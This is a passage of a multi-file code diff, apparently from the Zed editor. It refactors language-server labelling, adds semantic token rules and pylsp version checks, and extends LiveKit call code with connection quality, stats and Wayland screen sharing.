+ picker.update_in(cx, |picker, window, cx| {
+ picker.update_matches("ru".to_string(), window, cx)
+ });
+ cx.run_until_parked();
+
+ picker.read_with(cx, |picker, _| {
+ assert!(
+ picker.delegate.matches.len() > 1,
+ "query should return multiple matches"
+ );
+ assert_eq!(picker.delegate.selected_index, 0);
+
+ let first_match = picker
+ .delegate
+ .matches
+ .first()
+ .expect("query should produce at least one match");
+ let selected_match = picker
+ .delegate
+ .matches
+ .get(picker.delegate.selected_index)
+ .expect("selected index should point to a match");
+
+ assert_eq!(selected_match.candidate_id, first_match.candidate_id);
});
- assert_selected_language_for_editor(&workspace, &empty_editor, None, cx);
}
}
@@ -209,20 +209,32 @@ impl HighlightsTreeView {
window: &mut Window,
cx: &mut Context<Self>,
) {
- let Some(editor) = active_item
- .filter(|item| item.item_id() != cx.entity_id())
- .and_then(|item| item.downcast::<Editor>())
- else {
- self.clear(cx);
- return;
+ let active_editor = match active_item {
+ Some(active_item) => {
+ if active_item.item_id() == cx.entity_id() {
+ return;
+ } else {
+ match active_item.downcast::<Editor>() {
+ Some(active_editor) => active_editor,
+ None => {
+ self.clear(cx);
+ return;
+ }
+ }
+ }
+ }
+ None => {
+ self.clear(cx);
+ return;
+ }
};
let is_different_editor = self
.editor
.as_ref()
- .is_none_or(|state| state.editor != editor);
+ .is_none_or(|state| state.editor != active_editor);
if is_different_editor {
- self.set_editor(editor, window, cx);
+ self.set_editor(active_editor, window, cx);
}
}
@@ -230,7 +230,7 @@ impl LanguageServerState {
(
server_id,
(
- status.server_version.clone(),
+ status.server_readable_version.clone(),
status.binary.as_ref().map(|b| b.path.clone()),
status.process_id,
),
@@ -18,7 +18,7 @@ use project::{
};
use proto::toggle_lsp_logs::LogType;
use std::{any::TypeId, borrow::Cow, sync::Arc};
-use ui::{Button, Checkbox, ContextMenu, Label, PopoverMenu, ToggleState, prelude::*};
+use ui::{Checkbox, ContextMenu, PopoverMenu, ToggleState, prelude::*};
use util::ResultExt as _;
use workspace::{
SplitDirection, ToolbarItemEvent, ToolbarItemLocation, ToolbarItemView, Workspace, WorkspaceId,
@@ -969,9 +969,11 @@ impl Render for LspLogToolbarItemView {
})
.unwrap_or_else(|| "No server selected".into()),
)
- .icon(IconName::ChevronDown)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted),
+ .end_icon(
+ Icon::new(IconName::ChevronDown)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ ),
)
.menu({
let log_view = log_view.clone();
@@ -1030,10 +1032,11 @@ impl Render for LspLogToolbarItemView {
PopoverMenu::new("LspViewSelector")
.anchor(Corner::TopLeft)
.trigger(
- Button::new("language_server_menu_header", label)
- .icon(IconName::ChevronDown)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted),
+ Button::new("language_server_menu_header", label).end_icon(
+ Icon::new(IconName::ChevronDown)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ ),
)
.menu(move |window, cx| {
let log_toolbar_view = log_toolbar_view.upgrade()?;
@@ -1125,9 +1128,11 @@ impl Render for LspLogToolbarItemView {
"language_server_trace_level_selector",
"Trace level",
)
- .icon(IconName::ChevronDown)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted),
+ .end_icon(
+ Icon::new(IconName::ChevronDown)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ ),
)
.menu({
let log_view = log_view;
@@ -1193,9 +1198,11 @@ impl Render for LspLogToolbarItemView {
"language_server_log_level_selector",
"Log level",
)
- .icon(IconName::ChevronDown)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted),
+ .end_icon(
+ Icon::new(IconName::ChevronDown)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ ),
)
.menu({
let log_view = log_view;
@@ -1348,6 +1355,7 @@ impl ServerInfo {
status: LanguageServerStatus {
name: server.name(),
server_version: server.version(),
+ server_readable_version: server.readable_version(),
pending_work: Default::default(),
has_pending_diagnostic_updates: false,
progress_tokens: Default::default(),
@@ -1,3 +1,15 @@
+use settings::SemanticTokenRules;
+
+use crate::LanguageDir;
+
+pub(crate) fn semantic_token_rules() -> SemanticTokenRules {
+ let content = LanguageDir::get("cpp/semantic_token_rules.json")
+ .expect("missing cpp/semantic_token_rules.json");
+ let json = std::str::from_utf8(&content.data).expect("invalid utf-8 in semantic_token_rules");
+ settings::parse_json_with_comments::<SemanticTokenRules>(json)
+ .expect("failed to parse cpp semantic_token_rules.json")
+}
+
#[cfg(test)]
mod tests {
use gpui::{AppContext as _, BorrowAppContext, TestAppContext};
@@ -1,6 +1,6 @@
name = "C++"
grammar = "cpp"
-path_suffixes = ["cc", "hh", "cpp", "cppm", "h", "hpp", "cxx", "hxx", "c++", "h++", "ipp", "inl", "ino", "ixx", "cu", "cuh", "C", "H"]
+path_suffixes = ["cc", "ccm", "hh", "cpp", "cppm", "h", "hpp", "cxx", "cxxm", "hxx", "c++", "c++m", "h++", "ipp", "inl", "ino", "ixx", "cu", "cuh", "C", "H"]
line_comments = ["// ", "/// ", "//! "]
first_line_pattern = '^//.*-\*-\s*C\+\+\s*-\*-'
decrease_indent_patterns = [
@@ -0,0 +1,7 @@
+[
+ {
+ "token_type": "variable",
+ "token_modifiers": ["readonly"],
+ "style": ["constant"]
+ }
+]
@@ -7,7 +7,7 @@ path_suffixes = [
"NOTES_EDITMSG",
"EDIT_DESCRIPTION",
]
-line_comments = ["#"]
+line_comments = ["# "]
brackets = [
{ start = "(", end = ")", close = true, newline = false },
{ start = "`", end = "`", close = true, newline = false },
@@ -5,7 +5,10 @@ use futures::StreamExt;
use gpui::{App, AsyncApp, Task};
use http_client::github::latest_github_release;
pub use language::*;
-use language::{LanguageToolchainStore, LspAdapterDelegate, LspInstaller};
+use language::{
+ LanguageName, LanguageToolchainStore, LspAdapterDelegate, LspInstaller,
+ language_settings::language_settings,
+};
use lsp::{LanguageServerBinary, LanguageServerName};
use project::lsp_store::language_server_settings;
@@ -207,6 +210,12 @@ impl LspAdapter for GoLspAdapter {
delegate: &Arc<dyn LspAdapterDelegate>,
cx: &mut AsyncApp,
) -> Result<Option<serde_json::Value>> {
+ let semantic_tokens_enabled = cx.update(|cx| {
+ language_settings(Some(LanguageName::new("Go")), None, cx)
+ .semantic_tokens
+ .enabled()
+ });
+
let mut default_config = json!({
"usePlaceholders": false,
"hints": {
@@ -217,7 +226,8 @@ impl LspAdapter for GoLspAdapter {
"functionTypeParameters": true,
"parameterNames": true,
"rangeVariableTypes": true
- }
+ },
+ "semanticTokens": semantic_tokens_enabled
});
let project_initialization_options = cx.update(|cx| {
@@ -2,7 +2,7 @@ name = "Go Mod"
code_fence_block_name = "go.mod"
grammar = "gomod"
path_suffixes = ["mod"]
-line_comments = ["//"]
+line_comments = ["// "]
autoclose_before = ")"
brackets = [
{ start = "(", end = ")", close = true, newline = true}
@@ -2,7 +2,7 @@ name = "Go Work"
code_fence_block_name = "gowork"
grammar = "gowork"
path_suffixes = ["work"]
-line_comments = ["//"]
+line_comments = ["// "]
autoclose_before = ")"
brackets = [
{ start = "(", end = ")", close = true, newline = true}
@@ -247,7 +247,6 @@
"abstract"
"as"
"async"
- "await"
"debugger"
"declare"
"default"
@@ -294,6 +293,7 @@
] @keyword.import
[
+ "await"
"break"
"case"
"catch"
@@ -1,6 +1,6 @@
name = "JSONC"
grammar = "jsonc"
-path_suffixes = ["jsonc", "bun.lock", "devcontainer.json", "pyrightconfig.json", "tsconfig.json", "luaurc"]
+path_suffixes = ["jsonc", "bun.lock", "devcontainer.json", "pyrightconfig.json", "tsconfig.json", "luaurc", "swcrc", "babelrc", "eslintrc", "stylelintrc"]
line_comments = ["// "]
autoclose_before = ",]}"
brackets = [
@@ -125,6 +125,7 @@ pub fn init(languages: Arc<LanguageRegistry>, fs: Arc<dyn Fs>, node: NodeRuntime
LanguageInfo {
name: "cpp",
adapters: vec![c_lsp_adapter],
+ semantic_token_rules: Some(cpp::semantic_token_rules()),
..Default::default()
},
LanguageInfo {
@@ -190,7 +191,7 @@ pub fn init(languages: Arc<LanguageRegistry>, fs: Arc<dyn Fs>, node: NodeRuntime
context: Some(python_context_provider),
toolchain: Some(python_toolchain_provider),
manifest_name: Some(SharedString::new_static("pyproject.toml").into()),
- ..Default::default()
+ semantic_token_rules: Some(python::semantic_token_rules()),
},
LanguageInfo {
name: "rust",
@@ -21,7 +21,10 @@
(list_marker_parenthesis)
] @punctuation.list_marker.markup
-(block_quote_marker) @punctuation.markup
+[
+ (block_quote_marker)
+ (block_continuation)
+] @punctuation.markup
(pipe_table_header
"|" @punctuation.markup)
@@ -24,7 +24,7 @@ use project::lsp_store::language_server_settings;
use semver::Version;
use serde::{Deserialize, Serialize};
use serde_json::{Value, json};
-use settings::Settings;
+use settings::{SemanticTokenRules, Settings};
use terminal::terminal_settings::TerminalSettings;
use smol::lock::OnceCell;
@@ -37,6 +37,7 @@ use util::fs::{make_file_executable, remove_matching};
use util::paths::PathStyle;
use util::rel_path::RelPath;
+use crate::LanguageDir;
use http_client::github_download::{GithubBinaryMetadata, download_server_binary};
use parking_lot::Mutex;
use std::str::FromStr;
@@ -49,6 +50,14 @@ use std::{
use task::{ShellKind, TaskTemplate, TaskTemplates, VariableName};
use util::{ResultExt, maybe};
+pub(crate) fn semantic_token_rules() -> SemanticTokenRules {
+ let content = LanguageDir::get("python/semantic_token_rules.json")
+ .expect("missing python/semantic_token_rules.json");
+ let json = std::str::from_utf8(&content.data).expect("invalid utf-8 in semantic_token_rules");
+ settings::parse_json_with_comments::<SemanticTokenRules>(json)
+ .expect("failed to parse python semantic_token_rules.json")
+}
+
#[derive(Debug, Serialize, Deserialize)]
pub(crate) struct PythonToolchainData {
#[serde(flatten)]
@@ -159,6 +168,75 @@ fn process_pyright_completions(items: &mut [lsp::CompletionItem]) {
}
}
+fn label_for_pyright_completion(
+ item: &lsp::CompletionItem,
+ language: &Arc<language::Language>,
+) -> Option<language::CodeLabel> {
+ let label = &item.label;
+ let label_len = label.len();
+ let grammar = language.grammar()?;
+ let highlight_id = match item.kind? {
+ lsp::CompletionItemKind::METHOD => grammar.highlight_id_for_name("function.method"),
+ lsp::CompletionItemKind::FUNCTION => grammar.highlight_id_for_name("function"),
+ lsp::CompletionItemKind::CLASS => grammar.highlight_id_for_name("type"),
+ lsp::CompletionItemKind::CONSTANT => grammar.highlight_id_for_name("constant"),
+ lsp::CompletionItemKind::VARIABLE => grammar.highlight_id_for_name("variable"),
+ _ => {
+ return None;
+ }
+ };
+ let mut text = label.clone();
+ if let Some(completion_details) = item
+ .label_details
+ .as_ref()
+ .and_then(|details| details.description.as_ref())
+ {
+ write!(&mut text, " {}", completion_details).ok();
+ }
+ Some(language::CodeLabel::filtered(
+ text,
+ label_len,
+ item.filter_text.as_deref(),
+ highlight_id
+ .map(|id| (0..label_len, id))
+ .into_iter()
+ .collect(),
+ ))
+}
+
+fn label_for_python_symbol(
+ symbol: &Symbol,
+ language: &Arc<language::Language>,
+) -> Option<language::CodeLabel> {
+ let name = &symbol.name;
+ let (text, filter_range, display_range) = match symbol.kind {
+ lsp::SymbolKind::METHOD | lsp::SymbolKind::FUNCTION => {
+ let text = format!("def {}():\n", name);
+ let filter_range = 4..4 + name.len();
+ let display_range = 0..filter_range.end;
+ (text, filter_range, display_range)
+ }
+ lsp::SymbolKind::CLASS => {
+ let text = format!("class {}:", name);
+ let filter_range = 6..6 + name.len();
+ let display_range = 0..filter_range.end;
+ (text, filter_range, display_range)
+ }
+ lsp::SymbolKind::CONSTANT => {
+ let text = format!("{} = 0", name);
+ let filter_range = 0..name.len();
+ let display_range = 0..filter_range.end;
+ (text, filter_range, display_range)
+ }
+ _ => return None,
+ };
+ Some(language::CodeLabel::new(
+ text[display_range.clone()].to_string(),
+ filter_range,
+ language.highlight_text(&text.as_str().into(), display_range),
+ ))
+}
+
pub struct TyLspAdapter {
fs: Arc<dyn Fs>,
}
@@ -255,6 +333,14 @@ impl LspAdapter for TyLspAdapter {
))
}
+ async fn label_for_symbol(
+ &self,
+ symbol: &language::Symbol,
+ language: &Arc<language::Language>,
+ ) -> Option<language::CodeLabel> {
+ label_for_python_symbol(symbol, language)
+ }
+
async fn workspace_configuration(
self: Arc<Self>,
delegate: &Arc<dyn LspAdapterDelegate>,
@@ -531,36 +617,7 @@ impl LspAdapter for PyrightLspAdapter {
item: &lsp::CompletionItem,
language: &Arc<language::Language>,
) -> Option<language::CodeLabel> {
- let label = &item.label;
- let label_len = label.len();
- let grammar = language.grammar()?;
- let highlight_id = match item.kind? {
- lsp::CompletionItemKind::METHOD => grammar.highlight_id_for_name("function.method"),
- lsp::CompletionItemKind::FUNCTION => grammar.highlight_id_for_name("function"),
- lsp::CompletionItemKind::CLASS => grammar.highlight_id_for_name("type"),
- lsp::CompletionItemKind::CONSTANT => grammar.highlight_id_for_name("constant"),
- lsp::CompletionItemKind::VARIABLE => grammar.highlight_id_for_name("variable"),
- _ => {
- return None;
- }
- };
- let mut text = label.clone();
- if let Some(completion_details) = item
- .label_details
- .as_ref()
- .and_then(|details| details.description.as_ref())
- {
- write!(&mut text, " {}", completion_details).ok();
- }
- Some(language::CodeLabel::filtered(
- text,
- label_len,
- item.filter_text.as_deref(),
- highlight_id
- .map(|id| (0..label_len, id))
- .into_iter()
- .collect(),
- ))
+ label_for_pyright_completion(item, language)
}
async fn label_for_symbol(
@@ -568,34 +625,7 @@ impl LspAdapter for PyrightLspAdapter {
symbol: &language::Symbol,
language: &Arc<language::Language>,
) -> Option<language::CodeLabel> {
- let name = &symbol.name;
- let (text, filter_range, display_range) = match symbol.kind {
- lsp::SymbolKind::METHOD | lsp::SymbolKind::FUNCTION => {
- let text = format!("def {}():\n", name);
- let filter_range = 4..4 + name.len();
- let display_range = 0..filter_range.end;
- (text, filter_range, display_range)
- }
- lsp::SymbolKind::CLASS => {
- let text = format!("class {}:", name);
- let filter_range = 6..6 + name.len();
- let display_range = 0..filter_range.end;
- (text, filter_range, display_range)
- }
- lsp::SymbolKind::CONSTANT => {
- let text = format!("{} = 0", name);
- let filter_range = 0..name.len();
- let display_range = 0..filter_range.end;
- (text, filter_range, display_range)
- }
- _ => return None,
- };
-
- Some(language::CodeLabel::new(
- text[display_range.clone()].to_string(),
- filter_range,
- language.highlight_text(&text.as_str().into(), display_range),
- ))
+ label_for_python_symbol(symbol, language)
}
async fn workspace_configuration(
@@ -1080,6 +1110,7 @@ fn python_env_kind_display(k: &PythonEnvironmentKind) -> &'static str {
PythonEnvironmentKind::Venv => "venv",
PythonEnvironmentKind::VirtualEnv => "virtualenv",
PythonEnvironmentKind::VirtualEnvWrapper => "virtualenvwrapper",
+ PythonEnvironmentKind::WinPython => "WinPython",
PythonEnvironmentKind::WindowsStore => "global (Windows Store)",
PythonEnvironmentKind::WindowsRegistry => "global (Windows Registry)",
PythonEnvironmentKind::Uv => "uv",
@@ -1738,33 +1769,7 @@ impl LspAdapter for PyLspAdapter {
symbol: &language::Symbol,
language: &Arc<language::Language>,
) -> Option<language::CodeLabel> {
- let name = &symbol.name;
- let (text, filter_range, display_range) = match symbol.kind {
- lsp::SymbolKind::METHOD | lsp::SymbolKind::FUNCTION => {
- let text = format!("def {}():\n", name);
- let filter_range = 4..4 + name.len();
- let display_range = 0..filter_range.end;
- (text, filter_range, display_range)
- }
- lsp::SymbolKind::CLASS => {
- let text = format!("class {}:", name);
- let filter_range = 6..6 + name.len();
- let display_range = 0..filter_range.end;
- (text, filter_range, display_range)
- }
- lsp::SymbolKind::CONSTANT => {
- let text = format!("{} = 0", name);
- let filter_range = 0..name.len();
- let display_range = 0..filter_range.end;
- (text, filter_range, display_range)
- }
- _ => return None,
- };
- Some(language::CodeLabel::new(
- text[display_range.clone()].to_string(),
- filter_range,
- language.highlight_text(&text.as_str().into(), display_range),
- ))
+ label_for_python_symbol(symbol, language)
}
async fn workspace_configuration(
@@ -1846,6 +1851,17 @@ impl LspInstaller for PyLspAdapter {
) -> Option<LanguageServerBinary> {
if let Some(pylsp_bin) = delegate.which(Self::SERVER_NAME.as_ref()).await {
let env = delegate.shell_env().await;
+ delegate
+ .try_exec(LanguageServerBinary {
+ path: pylsp_bin.clone(),
+ arguments: vec!["--version".into()],
+ env: Some(env.clone()),
+ })
+ .await
+ .inspect_err(|err| {
+ log::warn!("failed to validate user-installed pylsp at {pylsp_bin:?}: {err:#}")
+ })
+ .ok()?;
Some(LanguageServerBinary {
path: pylsp_bin,
env: Some(env),
@@ -1854,7 +1870,21 @@ impl LspInstaller for PyLspAdapter {
} else {
let toolchain = toolchain?;
let pylsp_path = Path::new(toolchain.path.as_ref()).parent()?.join("pylsp");
- pylsp_path.exists().then(|| LanguageServerBinary {
+ if !pylsp_path.exists() {
+ return None;
+ }
+ delegate
+ .try_exec(LanguageServerBinary {
+ path: toolchain.path.to_string().into(),
+ arguments: vec![pylsp_path.clone().into(), "--version".into()],
+ env: None,
+ })
+ .await
+ .inspect_err(|err| {
+ log::warn!("failed to validate toolchain pylsp at {pylsp_path:?}: {err:#}")
+ })
+ .ok()?;
+ Some(LanguageServerBinary {
path: toolchain.path.to_string().into(),
arguments: vec![pylsp_path.into()],
env: None,
@@ -1994,36 +2024,7 @@ impl LspAdapter for BasedPyrightLspAdapter {
item: &lsp::CompletionItem,
language: &Arc<language::Language>,
) -> Option<language::CodeLabel> {
- let label = &item.label;
- let label_len = label.len();
- let grammar = language.grammar()?;
- let highlight_id = match item.kind? {
- lsp::CompletionItemKind::METHOD => grammar.highlight_id_for_name("function.method"),
- lsp::CompletionItemKind::FUNCTION => grammar.highlight_id_for_name("function"),
- lsp::CompletionItemKind::CLASS => grammar.highlight_id_for_name("type"),
- lsp::CompletionItemKind::CONSTANT => grammar.highlight_id_for_name("constant"),
- lsp::CompletionItemKind::VARIABLE => grammar.highlight_id_for_name("variable"),
- _ => {
- return None;
- }
- };
- let mut text = label.clone();
- if let Some(completion_details) = item
- .label_details
- .as_ref()
- .and_then(|details| details.description.as_ref())
- {
- write!(&mut text, " {}", completion_details).ok();
- }
- Some(language::CodeLabel::filtered(
- text,
- label_len,
- item.filter_text.as_deref(),
- highlight_id
- .map(|id| (0..label.len(), id))
- .into_iter()
- .collect(),
- ))
+ label_for_pyright_completion(item, language)
}
async fn label_for_symbol(
@@ -2031,33 +2032,7 @@ impl LspAdapter for BasedPyrightLspAdapter {
symbol: &Symbol,
language: &Arc<language::Language>,
) -> Option<language::CodeLabel> {
- let name = &symbol.name;
- let (text, filter_range, display_range) = match symbol.kind {
- lsp::SymbolKind::METHOD | lsp::SymbolKind::FUNCTION => {
- let text = format!("def {}():\n", name);
- let filter_range = 4..4 + name.len();
- let display_range = 0..filter_range.end;
- (text, filter_range, display_range)
- }
- lsp::SymbolKind::CLASS => {
- let text = format!("class {}:", name);
- let filter_range = 6..6 + name.len();
- let display_range = 0..filter_range.end;
- (text, filter_range, display_range)
- }
- lsp::SymbolKind::CONSTANT => {
- let text = format!("{} = 0", name);
- let filter_range = 0..name.len();
- let display_range = 0..filter_range.end;
- (text, filter_range, display_range)
- }
- _ => return None,
- };
- Some(language::CodeLabel::new(
- text[display_range.clone()].to_string(),
- filter_range,
- language.highlight_text(&text.as_str().into(), display_range),
- ))
+ label_for_python_symbol(symbol, language)
}
async fn workspace_configuration(
@@ -0,0 +1,15 @@
+[
+ {
+ "token_type": "selfParameter",
+ "style": ["variable.special"]
+ },
+ {
+ "token_type": "clsParameter",
+ "style": ["variable.special"]
+ },
+ // ty specific
+ {
+ "token_type": "builtinConstant",
+ "style": ["constant.builtin"]
+ }
+]
@@ -7,14 +7,17 @@
("{" @open
"}" @close)
-("<" @open
+(("<" @open
">" @close)
+ (#set! rainbow.exclude))
-("<" @open
+(("<" @open
"/>" @close)
+ (#set! rainbow.exclude))
-("</" @open
+(("</" @open
">" @close)
+ (#set! rainbow.exclude))
(("\"" @open
"\"" @close)
@@ -268,7 +268,6 @@
"abstract"
"as"
"async"
- "await"
"debugger"
"declare"
"default"
@@ -318,6 +317,7 @@
] @keyword.import
[
+ "await"
"break"
"case"
"catch"
@@ -387,7 +387,6 @@
"abstract"
"as"
"async"
- "await"
"debugger"
"declare"
"default"
@@ -437,6 +436,7 @@
] @keyword.import
[
+ "await"
"break"
"case"
"catch"
@@ -47,6 +47,10 @@ util.workspace = true
libwebrtc.workspace = true
livekit.workspace = true
+[target.'cfg(target_os = "linux")'.dependencies]
+tokio = { workspace = true, features = ["time"] }
+webrtc-sys.workspace = true
+
[target.'cfg(any(target_os = "linux", target_os = "freebsd", target_os = "windows"))'.dependencies]
scap.workspace = true
@@ -35,15 +35,7 @@ fn main() {
cx.activate(true);
cx.on_action(quit);
cx.bind_keys([KeyBinding::new("cmd-q", Quit, None)]);
- cx.set_menus(vec![Menu {
- name: "Zed".into(),
- items: vec![MenuItem::Action {
- name: "Quit".into(),
- action: Box::new(Quit),
- os_action: None,
- checked: false,
- }],
- }]);
+ cx.set_menus([Menu::new("Zed").items([MenuItem::action("Quit", Quit)])]);
let livekit_url = std::env::var("LIVEKIT_URL").unwrap_or("http://localhost:7880".into());
let livekit_key = std::env::var("LIVEKIT_KEY").unwrap_or("devkey".into());
@@ -255,7 +247,7 @@ impl LivekitWindow {
} else {
let room = self.room.clone();
cx.spawn_in(window, async move |this, cx| {
- let (publication, stream) = room
+ let (publication, stream, _input_lag_us) = room
.publish_local_microphone_track("test_user".to_string(), false, cx)
.await
.unwrap();
@@ -67,6 +67,14 @@ pub enum Participant {
Remote(RemoteParticipant),
}
+#[derive(Copy, Clone, Debug, Eq, PartialEq, PartialOrd, Ord)]
+pub enum ConnectionQuality {
+ Excellent,
+ Good,
+ Poor,
+ Lost,
+}
+
#[derive(Debug, Clone)]
pub enum TrackPublication {
Local(LocalTrackPublication),
@@ -179,6 +187,10 @@ pub enum RoomEvent {
ActiveSpeakersChanged {
speakers: Vec<Participant>,
},
+ ConnectionQualityChanged {
+ participant: Participant,
+ quality: ConnectionQuality,
+ },
ConnectionStateChanged(ConnectionState),
Connected {
participants_with_tracks: Vec<(RemoteParticipant, Vec<RemoteTrackPublication>)>,
@@ -1,19 +1,21 @@
-use anyhow::{Context as _, Result, anyhow};
+use anyhow::{Context as _, Result};
use audio::AudioSettings;
use collections::HashMap;
use futures::{SinkExt, channel::mpsc};
use gpui::{App, AsyncApp, ScreenCaptureSource, ScreenCaptureStream, Task};
use gpui_tokio::Tokio;
-use log::info;
+
use playback::capture_local_video_track;
use settings::Settings;
+use std::sync::{Arc, atomic::AtomicU64};
+#[cfg(target_os = "linux")]
+mod linux;
mod playback;
-use crate::{
- LocalTrack, Participant, RemoteTrack, RoomEvent, TrackPublication,
- livekit_client::playback::Speaker,
-};
+use crate::{ConnectionQuality, LocalTrack, Participant, RemoteTrack, RoomEvent, TrackPublication};
+pub use livekit::SessionStats;
+pub use livekit::webrtc::stats::RtcStats;
pub use playback::AudioStream;
pub(crate) use playback::{RemoteVideoFrame, play_remote_video_track};
@@ -107,8 +109,8 @@ impl Room {
user_name: String,
is_staff: bool,
cx: &mut AsyncApp,
- ) -> Result<(LocalTrackPublication, playback::AudioStream)> {
- let (track, stream) = self
+ ) -> Result<(LocalTrackPublication, playback::AudioStream, Arc<AtomicU64>)> {
+ let (track, stream, input_lag_us) = self
.playback
.capture_local_microphone_track(user_name, is_staff, &cx)?;
let publication = self
@@ -123,7 +125,7 @@ impl Room {
)
.await?;
- Ok((publication, stream))
+ Ok((publication, stream, input_lag_us))
}
pub async fn unpublish_local_track(
@@ -139,28 +141,37 @@ impl Room {
track: &RemoteAudioTrack,
cx: &mut App,
) -> Result<playback::AudioStream> {
- let speaker: Speaker =
- serde_urlencoded::from_str(&track.0.name()).unwrap_or_else(|_| Speaker {
- name: track.0.name(),
- is_staff: false,
- sends_legacy_audio: true,
- });
-
- if AudioSettings::get_global(cx).rodio_audio {
- info!("Using experimental.rodio_audio audio pipeline for output");
- playback::play_remote_audio_track(&track.0, speaker, cx)
- } else if speaker.sends_legacy_audio {
- let output_audio_device = AudioSettings::get_global(cx).output_audio_device.clone();
- Ok(self
- .playback
- .play_remote_audio_track(&track.0, output_audio_device))
- } else {
- Err(anyhow!("Client version too old to play audio in call"))
- }
+ let output_audio_device = AudioSettings::get_global(cx).output_audio_device.clone();
+ Ok(self
+ .playback
+ .play_remote_audio_track(&track.0, output_audio_device))
+ }
+
+ pub async fn get_stats(&self) -> Result<livekit::SessionStats> {
+ self.room.get_stats().await.map_err(anyhow::Error::from)
+ }
+
+ /// Returns a `Task` that fetches room stats on the Tokio runtime.
+ ///
+ /// LiveKit's SDK is Tokio-based, so the stats fetch must run within
+ /// a Tokio context rather than on GPUI's smol-based background executor.
+ pub fn stats_task(&self, cx: &impl gpui::AppContext) -> Task<Result<livekit::SessionStats>> {
+ let inner = self.room.clone();
+ Tokio::spawn_result(cx, async move {
+ inner.get_stats().await.map_err(anyhow::Error::from)
+ })
}
}
impl LocalParticipant {
+ pub fn connection_quality(&self) -> ConnectionQuality {
+ connection_quality_from_livekit(self.0.connection_quality())
+ }
+
+ pub fn audio_level(&self) -> f32 {
+ self.0.audio_level()
+ }
+
pub async fn publish_screenshare_track(
&self,
source: &dyn ScreenCaptureSource,
@@ -205,6 +216,33 @@ impl LocalParticipant {
.map(LocalTrackPublication)
.context("unpublishing a track")
}
+
+ #[cfg(target_os = "linux")]
+ pub async fn publish_screenshare_track_wayland(
+ &self,
+ cx: &mut AsyncApp,
+ ) -> Result<(
+ LocalTrackPublication,
+ Box<dyn ScreenCaptureStream>,
+ futures::channel::oneshot::Receiver<()>,
+ )> {
+ let (track, stop_flag, feed_task, failure_rx) =
+ linux::start_wayland_desktop_capture(cx).await?;
+ let options = livekit::options::TrackPublishOptions {
+ source: livekit::track::TrackSource::Screenshare,
+ video_codec: livekit::options::VideoCodec::VP8,
+ ..Default::default()
+ };
+ let publication = self
+ .publish_track(livekit::track::LocalTrack::Video(track.0), options, cx)
+ .await?;
+
+ Ok((
+ publication,
+ Box::new(linux::WaylandScreenCaptureStream::new(stop_flag, feed_task)),
+ failure_rx,
+ ))
+ }
}
impl LocalTrackPublication {
@@ -234,6 +272,14 @@ impl LocalTrackPublication {
}
impl RemoteParticipant {
+ pub fn connection_quality(&self) -> ConnectionQuality {
+ connection_quality_from_livekit(self.0.connection_quality())
+ }
+
+ pub fn audio_level(&self) -> f32 {
+ self.0.audio_level()
+ }
+
pub fn identity(&self) -> ParticipantIdentity {
ParticipantIdentity(self.0.identity().0)
}
@@ -297,6 +343,31 @@ impl Participant {
}
}
}
+
+ pub fn connection_quality(&self) -> ConnectionQuality {
+ match self {
+ Participant::Local(local_participant) => local_participant.connection_quality(),
+ Participant::Remote(remote_participant) => remote_participant.connection_quality(),
+ }
+ }
+
+ pub fn audio_level(&self) -> f32 {
+ match self {
+ Participant::Local(local_participant) => local_participant.audio_level(),
+ Participant::Remote(remote_participant) => remote_participant.audio_level(),
+ }
+ }
+}
+
+fn connection_quality_from_livekit(
+ quality: livekit::prelude::ConnectionQuality,
+) -> ConnectionQuality {
+ match quality {
+ livekit::prelude::ConnectionQuality::Excellent => ConnectionQuality::Excellent,
+ livekit::prelude::ConnectionQuality::Good => ConnectionQuality::Good,
+ livekit::prelude::ConnectionQuality::Poor => ConnectionQuality::Poor,
+ livekit::prelude::ConnectionQuality::Lost => ConnectionQuality::Lost,
+ }
}
fn participant_from_livekit(participant: livekit::participant::Participant) -> Participant {
@@ -474,6 +545,13 @@ fn room_event_from_livekit(event: livekit::RoomEvent) -> Option<RoomEvent> {
},
livekit::RoomEvent::Reconnecting => RoomEvent::Reconnecting,
livekit::RoomEvent::Reconnected => RoomEvent::Reconnected,
+ livekit::RoomEvent::ConnectionQualityChanged {
+ quality,
+ participant,
+ } => RoomEvent::ConnectionQualityChanged {
+ participant: participant_from_livekit(participant),
+ quality: connection_quality_from_livekit(quality),
+ },
_ => {
log::trace!("dropping livekit event: {:?}", event);
return None;
@@ -0,0 +1,203 @@
+use anyhow::Result;
+use futures::StreamExt as _;
+use futures::channel::oneshot;
+use gpui::{AsyncApp, ScreenCaptureStream};
+use livekit::track;
+use livekit::webrtc::{
+ prelude::NV12Buffer,
+ video_frame::{VideoFrame, VideoRotation},
+ video_source::{RtcVideoSource, VideoResolution, native::NativeVideoSource},
+};
+use std::sync::{
+ Arc,
+ atomic::{AtomicBool, AtomicU64, Ordering},
+};
+
+static NEXT_WAYLAND_SHARE_ID: AtomicU64 = AtomicU64::new(1);
+const PIPEWIRE_TIMEOUT_S: u64 = 30;
+
+pub struct WaylandScreenCaptureStream {
+ id: u64,
+ stop_flag: Arc<AtomicBool>,
+ _capture_task: gpui::Task<()>,
+}
+
+impl WaylandScreenCaptureStream {
+ pub fn new(stop_flag: Arc<AtomicBool>, capture_task: gpui::Task<()>) -> Self {
+ Self {
+ id: NEXT_WAYLAND_SHARE_ID.fetch_add(1, Ordering::Relaxed),
+ stop_flag,
+ _capture_task: capture_task,
+ }
+ }
+}
+
+impl ScreenCaptureStream for WaylandScreenCaptureStream {
+ fn metadata(&self) -> Result<gpui::SourceMetadata> {
+ Ok(gpui::SourceMetadata {
+ id: self.id,
+ label: None,
+ is_main: None,
+ resolution: gpui::size(gpui::DevicePixels(1), gpui::DevicePixels(1)),
+ })
+ }
+}
+
+impl Drop for WaylandScreenCaptureStream {
+ fn drop(&mut self) {
+ self.stop_flag.store(true, Ordering::Release);
+ }
+}
+
+pub(crate) async fn start_wayland_desktop_capture(
+ cx: &mut AsyncApp,
+) -> Result<(
+ crate::LocalVideoTrack,
+ Arc<AtomicBool>,
+ gpui::Task<()>,
+ oneshot::Receiver<()>,
+)> {
+ use futures::channel::mpsc;
+ use gpui::FutureExt as _;
+ use libwebrtc::desktop_capturer::{
